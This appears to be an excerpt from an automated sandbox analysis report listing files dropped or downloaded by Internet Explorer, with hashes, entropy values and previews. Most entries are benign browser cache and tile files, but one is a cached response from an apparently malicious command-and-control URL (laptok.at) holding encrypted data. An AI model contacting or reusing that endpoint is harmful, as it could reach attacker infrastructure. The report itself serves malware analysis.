Preview:	<root></root><root><item name="HBCM_BIDS" value="{}" ltime="2498835088" htime="30867672" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2498835088" htime="30867672" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2498835088" htime="30867672" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2498835088" htime="30867672" /><item name="mntest" value="mntest" ltime="2498915088" htime="30867672" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2498955088" htime="30867672" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2498955088" htime="30867672" /><item name="mntest" value="mntest" ltime="2498995088" htime="30867672" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2498955088" htime="30867672" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2498955088" htime="30867672" /><item name="mntest" value="mntest" ltime="2500795088" htime="30867672" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2498955088" htime="30867672" /></root><ro

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CFBA71BC-6CCB-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	107816
Entropy (8bit):	2.2670174530645344
Encrypted:	false
SSDEEP:	192:rbZ0ZD2zWntafDCtmoMzWtEDuEBtlocvbDt9WFhDttbDf+WqoDfGSpbKf/WK2Kfy:rtE6Kt4uvM7GR4aGjVbCwwB1+1pR8EE9
MD5:	E2D178CBC65F1C2D66B537EFDD8EAC3D
SHA1:	0532B47BBB8281F0A8D86472F20CE8D9293F8267
SHA-256:	F99DC409A051BDB9B8E7F6AFD721857A1442CC356073301ACA908E00D5789BA7
SHA-512:	91181EBCB013AFC814F1F239B8B6E67ECC6F643DB3DE35629689BA34E413E417E9F79FBFDA948BA997E766359F3D77C40DD96A1A4B69816F405AB098BB0F2EF1
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{CFBA71BE-6CCB-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	195058
Entropy (8bit):	3.584089616140025
Encrypted:	false
SSDEEP:	3072:oZ/2BfcYmu5kLTzGtFZ/2Bfc/mu5kLTzGtj:BUU
MD5:	56A45E6D3CB5D05DFC7D8B0BD051BC78
SHA1:	F816D995FE2D2B455BF94323FEBB5F0A45C9572A
SHA-256:	7DA55893AAAA8FF9D3D6B6EA4588F2CC1979C44DAEDC5D60A80386FA0AFE3197
SHA-512:	92336FD11D5CC1F1E294DD1002E45BB4C88F26F0EA6DA8E6B5D2AE08BBFD5DBC74E3977BD4734F618D605FAD4DEA2A65E00170B3265E72A9C60CA0A6BEABBFEF
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F336FB9E-6CCB-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27596
Entropy (8bit):	1.9129125391543558
Encrypted:	false
SSDEEP:	96:raZpQ66UBSJj921WZMFtmxzP5GYIlmxzP5GYsxzPFA:raZpQ66UkJj921WZMFtm+lmyXA
MD5:	239C6697DA8388E9C32FC165A01DB693
SHA1:	644DB428D84EC7DDB0CD3E6F766E3C40ECFAB353
SHA-256:	56D9D418EF08F20DA47FC41735C0F50A29A4F2DF2EFC0B6F2FB4EA2A7CC9B9DF
SHA-512:	A5D26BFB6DD769E524DE6EDAB551F645FA0EDE606297A1946E3F4804567957DA9F03E8649755DE3087A38BF619C353594EA97C9512E0E5EC4CDD42AB9EF44B2F
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F336FBA0-6CCB-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28144
Entropy (8bit):	1.9131140529635309
Encrypted:	false
SSDEEP:	96:ryYZoZQ66YBSGjB2FWhMBZanF30q8I91a+nF30q8ISA:ryYZoZQ66YkGjB2FWhMBZaFpP1a+FpQA
MD5:	DC9344212389A83176029A88A450AD5A
SHA1:	C0F9BF2F1F755010695EB609E3D91A39149D7AA5
SHA-256:	93D29A9940A642A77205CF178BCE142E06BB3C3D34D1934445F1641FFCD18F91
SHA-512:	B23B993BB99ACBBFE71800155CCB677D5248024B200F4CD01B8A3DD3E79F3559947FF9267E33B1CDCB92C9A386F21376FDD05D294D16FA4C5510397A98BFC923
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F336FBA2-6CCB-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28160
Entropy (8bit):	1.9199413258420543
Encrypted:	false
SSDEEP:	96:rDZMQY6jBSAj521WzMrJf4UaiUO+IairV4UaSUaiUO+IaiUA:rDZMQY6jkAj521WzMrp2zSjV2YzSsA
MD5:	6DBCC9F91C5E9EADBE27DE95461E1B5C
SHA1:	D44E549DFB25351DED2551E098365C5404FC0CC2
SHA-256:	BDCB1AB6CC397309DCDE9130ED7377692EED193E02E828314D161BB6A248DC7C
SHA-512:	1DCA64177558F9A1969091DD7FD73FEDC4A734FC90CE664C50DA078B54526DF2928C1432D3586874A59BBFAC16183D76CA5B29DBB2CD9F0EA3CCE1ADCDD0232F
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FD46581A-6CCB-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	19032
Entropy (8bit):	1.5812070694693987
Encrypted:	false
SSDEEP:	48:IwnGcpryGwpa/G4pQvGrapbSIGQpKwG7HpRfTGIpX2nGApm:rNZ6QR6zBSwALTdFqg
MD5:	629E0D412854ABA01A60CC65D891D484
SHA1:	A6E4CCFDB4200DB7BA6FB087B6A298F92870F864
SHA-256:	DA7832B406B32B54ECEF8865F386BC62E676E0A0AD7CD37DC23462B21068FEAC
SHA-512:	2AFDB951C9A9000C2BC3902C7F58F475C3878BF7382004609EF6DF911FD893429BC742C0D2AA13EEFAF9606DD059BFC94BE2794B55D5CB3D60809141479302E3
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.07903087168225
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEio4mgoDnWimI002EtM3MHdNMNxOEio4mgoDnWimI00OYGVbkEtMb:2d6NxOg4CDSZHKd6NxOg4CDSZ7YLb
MD5:	E9B658597DB8D10412EA75DEA3BB42BD
SHA1:	DF5E5D9C899730252531C39D4C20CC774A45455C
SHA-256:	2CF3114C82E238F7D894A4A7AF7D4AD17410095E9B8070F8AEB037ED8C945A8F
SHA-512:	E26F77E57ED2A257A5A6DFFBFEEBEA83B9B8BEF3FAD2DD83146D7968F4B3345E7DD826E7A348082697CFA64D3640E3F57A201FC20F354D59FDEA4C0DC684169D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa6305144,0x01d700d8</date><accdate>0xa6305144,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa6305144,0x01d700d8</date><accdate>0xa6305144,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.137134468423956
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2k0PmqAnWimI002EtM3MHdNMNxe2k0PmqAnWimI00OYGkak6EtMb:2d6NxrPPRASZHKd6NxrPPRASZ7Yza7b
MD5:	454AB3A995075F89FB0D4B3F3BCF1A51
SHA1:	48EE9EEF1BF25A38EAD47393A343392EEC50F4B3
SHA-256:	8914681D35B27C1ED324AF604D636CF86541284D66B26ECF43126CBF6FF99602
SHA-512:	59E22550642D5F5FE03E2A6BE21EEC0F69E62F294C8369FBCAFD56B5AD157418A0BDED449E6E478F9AA7630A42996391EFCF1D463126CAAB116025A389CD0117
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xa6292a49,0x01d700d8</date><accdate>0xa6292a49,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xa6292a49,0x01d700d8</date><accdate>0xa6292a49,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.097250262156391
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLio4mgoDnWimI002EtM3MHdNMNxvLio4mgoDnWimI00OYGmZEtMb:2d6Nxvt4CDSZHKd6Nxvt4CDSZ7Yjb
MD5:	C1FC4567BBCD8CAA347E2C0FC4DF8B74
SHA1:	5FBBEE44FD71168A0E43B6AD37CD4C2201A89B23
SHA-256:	B97DA43EBDC011B30B4B7D4174BE7D823393C87FF6152F0E2808F215C5D90E81
SHA-512:	C526BC2EFBB8014F08B0C0D0711203F9985ACF784D09D886CCE6D2BFE8C2D26B30F5BA43AEFDFBE6146EFF1C15E313F08E0CA945A956FA4DFE88A0418E887E9C
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xa6305144,0x01d700d8</date><accdate>0xa6305144,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xa6305144,0x01d700d8</date><accdate>0xa6305144,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	5.07065235292181
Encrypted:	false
SSDEEP:	12:TMHdNMNxiNmcnWimI002EtM3MHdNMNxiNmcnWimI00OYGd5EtMb:2d6Nxw3SZHKd6Nxw3SZ7YEjb
MD5:	5918E44D2DD38B23EF9AA0DE523674F8
SHA1:	8F5FBCDAC407B8F774F9040414DF329F3F113C60
SHA-256:	2482979D26425EE244AB02CAA0BE8976CA39DB88F1186DE4F068B69C919E4B77
SHA-512:	A5933AB5CCB329008541BD4525560DE9FBEE8D4F16F60E052D12EF577BA0F060AFB3802D89F2A3325CEEA21E637EBD17527D9131018FA96F573343CA84873761
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xa62def05,0x01d700d8</date><accdate>0xa62def05,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xa62def05,0x01d700d8</date><accdate>0xa62def05,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.113332324846512
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwio4mgoDnWimI002EtM3MHdNMNxhGwio4mgoDnWimI00OYG8K075Es:2d6NxQs4CDSZHKd6NxQs4CDSZ7YrKajb
MD5:	BDDB9FF0D24260D99F660B7A9DC48DDA
SHA1:	25272BA0E4221E537C8DED5FDD5DD372BE100203
SHA-256:	08C7BCC0267F000604C942B9FFA0E66ED3EFB44D3D122F654F02CA0CEBC70778
SHA-512:	5B9CC546C4BA6FEF8D791EAFB4DBB7DE1808DF16F6280CD68F43AFE45E2E0F4BF921C3F7D2C2100CBDF1539ABDFA8E4A84B40E19B310E7D79EB21FD215882814
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa6305144,0x01d700d8</date><accdate>0xa6305144,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa6305144,0x01d700d8</date><accdate>0xa6305144,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.054622255835709
Encrypted:	false
SSDEEP:	12:TMHdNMNx0nNmcnWimI002EtM3MHdNMNx0nNmcnWimI00OYGxEtMb:2d6Nx0N3SZHKd6Nx0N3SZ7Ygb
MD5:	5A9BB89FFD62A10F5153837416942227
SHA1:	3B38DB998901B6CDF865DF7BC250E6CE9157BEEF
SHA-256:	6A41AB37EEFF865CA6A0950DA9C660F0A3DAC267DB72D8657F5CC2637E5D6EF6
SHA-512:	25B4433470834C3A09AF237220B0E81F6545699F8D6F395D85F90EC58EA07DF659DAFE41BA355A84BD1DF8B89A5813F9D78773BB1D307A7FBCEA82B265AED67D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xa62def05,0x01d700d8</date><accdate>0xa62def05,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xa62def05,0x01d700d8</date><accdate>0xa62def05,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.095357091361371
Encrypted:	false
SSDEEP:	12:TMHdNMNxxNmcnWimI002EtM3MHdNMNxxNmcnWimI00OYG6Kq5EtMb:2d6Nx/3SZHKd6Nx/3SZ7Yhb
MD5:	B6E9950A17E56DC85277A8065723D8E8
SHA1:	5197C95FC06461C9FF96B9CC1E6A640DEEF1C593
SHA-256:	10DA6C3817C50CF22986D27CDA187C81C359CF5142945D6151E7D66DCB07127D
SHA-512:	5CD53497C4AE1CAFAE151E123613EA62B1C95FA4CACF6BDCAEDE64D94B69A61674ADE2A45289DB1A44D5CEDB7B4E5B52D83FFF02C45F61BF4A7A4353CACE6B1E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xa62def05,0x01d700d8</date><accdate>0xa62def05,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xa62def05,0x01d700d8</date><accdate>0xa62def05,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.084063994816374
Encrypted:	false
SSDEEP:	12:TMHdNMNxcp4m3DnWimI002EtM3MHdNMNxcp4m3DnWimI00OYGVEtMb:2d6NxI4KDSZHKd6NxI4KDSZ7Ykb
MD5:	1A2F59886069A9FC8E5C585DDA164629
SHA1:	87FCC3F85951D9DFC63FAFB889FF2C3640E69D31
SHA-256:	D6B5543381220294F9D88CCE49B9259BF9A46224E77A355FA0BBF602BCADBEEE
SHA-512:	E8D03D24D1EC5A43F40487B9C03FD45A384842CDD2EDE9DDBA01A687E81EEBCF6B81CFBFC610CE85D99C3D190DFD45797E06526F2D67F4FFC074502145AC51EC
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa62b8c8d,0x01d700d8</date><accdate>0xa62b8c8d,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa62b8c8d,0x01d700d8</date><accdate>0xa62b8c8d,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.068788520517224
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnp4m3DnWimI002EtM3MHdNMNxfnp4m3DnWimI00OYGe5EtMb:2d6Nxx4KDSZHKd6Nxx4KDSZ7YLjb
MD5:	47E10E9E7D60C25EA2EEE02D39F5012D
SHA1:	CD13E48D1AFBEE1C20CA18E9B3507F0BC1BB3538
SHA-256:	A8D2D6229C42155A10B3EE14A8ECF2521B6C4A350F394200508EECC3C256EDBF
SHA-512:	C6508630124FA30CF27AD2FC4044DD1F7B818935677033764EEC0D1997503DAC2915A583132F5C5E89D32194C24831749A63D1FB5D22C76AEE2CE3F9B98581D0
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xa62b8c8d,0x01d700d8</date><accdate>0xa62b8c8d,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xa62b8c8d,0x01d700d8</date><accdate>0xa62b8c8d,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\gee00pr\imagestore.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	7.0377063589990465
Encrypted:	false
SSDEEP:	24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGy:u6tWu/6symC+PTCq5TcBUX4bo
MD5:	44E52AD86F326BD4817F140E2EC22482
SHA1:	704DCCFC844972F2BF6472D2EE7F4335AA4A9BA7
SHA-256:	A3BC514A9A357CBCF4105EFF38D736F723C16901F3E6F9D4B048014D97541533
SHA-512:	36D3378EA377211B5B1E808E3F0448B7A55C807A0AC6C7ABF324E27EFB89D5B99D70113E60B26C1CC3296985E6BB56811EBA68D7A2A24F0A693ACC64C9A20F77
Malicious:	false
Preview:	E.h.t.t.p.s.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.h.p.-.n.e.u./.s.c./.2.b./.a.5.e.a.2.1...i.c.o......PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D..M..............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q\|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq\|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`. ... .............%`......%`....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\4996b9[1].woff Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	Web Open Font Format, TrueType, length 45633, version 1.0
Category:	downloaded
Size (bytes):	45633
Entropy (8bit):	6.523183274214988
Encrypted:	false
SSDEEP:	768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
MD5:	A92232F513DC07C229DDFA3DE4979FBA
SHA1:	EB6E465AE947709D5215269076F99766B53AE3D1
SHA-256:	F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
SHA-512:	32A33CC9D6F2F1C962174F6CC636053A4BFA29A287AF72B2E2825D8FA6336850C902AB3F4C07FB4BF0158353EBBD36C0D367A5E358D9840D70B90B93DB2AE32D
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Preview:	wOFF.......A...........................,....OS/2...p...`...`B.Y.cmap.............G.glyf.......,...,0..Hhead.......6...6....hhea...,...$...$....hmtx............($LKloca...`...f...f....maxp...P... ... ....name............IU..post....... ... ............I.A_.<........... ........d........................^...q.d.Z.................................................................3.......3.....f..............................HL .@...U...f.........................................\.d.\.d...d.e.d.Z.d.b.d.4.d.=.d.Y.d.c.d.].d.b.d.I.d.b.d.f.d._.d.^.d.(.d.b.d.^.d.b.d.b.d...d...d._.d._.d...d...d.P.d.0.d.b.d.b.d.P.d.u.d.c.d.^.d._.d.q.d._.d.d.d.b.d._.d._.d.b.d.a.d.b.d.a.d.b.d...d...d.^.d.^.d.`.d.[.d...d...d.$.d.p.d...d...d.^.d._.d.T.d...d.b.d.b.d.b.d.i.d.d.d...d...d...d.7.d.^.d.X.d.].d.).d.l.d.l.d.b.d.b.d.,.d.,.d.b.d.b.d...d...d...d.7.d.b.d.1.d.b.d.b.d...d...d...d...d...d.A.d...d...d.(.d.`.d...d...d.^.d.r.d.f.d.,.d.b.d...d.b.d._.d.q.d...d...d.b.d.b.d.b.d.b.d...d.r.d.I.d._.d.b.d.b.d.b.d.V.d.Z.d.b.d

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\6[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	2452
Entropy (8bit):	5.980949175131652
Encrypted:	false
SSDEEP:	48:7E4kWUc3VFpFe8mvuch62tTmLrHu4YDuGluZY0YPIzCMl:7ELLkVFpFiVtCLzcBwZYTgr
MD5:	B5094ABB22CB56F239AD9553108B55AF
SHA1:	57D09E66EBDA1D105875BBDD035F13D65A5C85DF
SHA-256:	60B4661804530111125C9E1AB017D14E7AA1D49919C8D5B82BDE9BA93080EE1E
SHA-512:	EAC11DD94B77967054FB1B412B7EE20E89A626D525ECA6864394FF22CF2212EDE72917EF2137768E141AA77A24A3CAA76523FF26A1618592AAB25B7449FF0D6B
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/wPzY3TDew43rXgQ6h/jEuIuoewqqB_/2F8ty3dLaY0/g90J7yjpK4odzi/vJi7IcKUU7_2FxV8Z1qJI/_2Fs8Hy6ruNNXyd6/38pqG0u5LLQdPzP/ktNaKKuwlZigK_2Bvf/4YgNdy1LG/0Pu5bq_2FGp6HB5pNjiJ/RyL8GbL1FBB7I0W7eeW/LbvyRsvJlR2hT9EfEV7uAT/oI3vL_2BYGZE4/pytYFaia/wB_2BesnXvclSGag5xIl6QE/_2Fx_2FVgm/IkzdNmlB1x77eK_2F/ru0HED6qmv28/EwOp3VJsFvN/Oy6MX9770H20zV/NCGPJIvS0pQunXbVHlbjM/xQp8l5w_2BDk0RE85W/6
Preview:	I7Tkj7EFIw+vz+i5b+CypYByeHy84M9WBLbT2jv1umlSbymnTUgt6EqjX9UROupLzuxmJhglyXnCrZJSQ0uR3vnMhNLbW+fBshGGZRgpx14qKk3QeQZ5DSNUtNYQk/WEXUhl9yDIe0GvU5p5BSGKJ2vMuDT8w1mhXvEuXEEkoRbxL/yVNsz3cR98icNeVcXpBh9OLT+jTy/4/S4ncRlwxIYanlUzF4PryNTwvpFbQlkGpZQKghE4gdhC3abYpvUZ1/9EUFi1DMjnUG/Fjfy9FysL6OS5/ptJV4kAqDK1sAk3MaxyIJ3wlHjXtvJKsGslNC1vfvGP4Py8aBHKwWiPprTeARTiMI2QBzN/ty+onuAYL9FOUu2y3Z0lbsHiamGTpXN/0b+aYFBpZ8VoFq8tBxZgSxNDRDevt0lyHxWj4bbpcn8u5zNNQsXggAFgE4tbEiz77xH5zQY1SIFq1Y9NoZyRJ/rseh/seJMT46YAIg+WML2pgEhW8qJDt6SVv29x/dV8eC3MKsxLCu3V4ajc4wWcQsqAcvvT77Gq40+6IeFf84cAKl8A7xB5Pxxqh51jgFqIswppSjDhAoXrgrb0ij3eX15s2bq61QilwMCFjcMWInsNVyhSMpvb3B9EuQDFA7l8gkDcfWUdKveMorhLF/3bOWcS7RhL88e8pbj8gjSuMVbzvEZECoxdARnaUQSgLkjk6THCldiqwhikTlKHcdoLs0I+gOUUiqCtoqUWc3i+e5dKHZGL7aLANIikHzxAPajGq7gG38gWbduJPUgWKDU+o8Gnbn3dNhxvTe9GlB5K1cCgrJ+/iz6G7QGrCFIr+uUX/A6QgPub//lB/CZjqU98BP3WNAuwuWDqo3ek4EkVeRdOz3YCLlztnQwRp5tSrplC3+AD1JmZv2Q8VXugCoZuq3C8+ivk/eOHpDSdOPRpTf0mX84yGxFZuFSh3mDSpAdMiY1JDchzJ8KL++mmlSMB4KFKStG21dUm6e6k

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\755f86[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	390
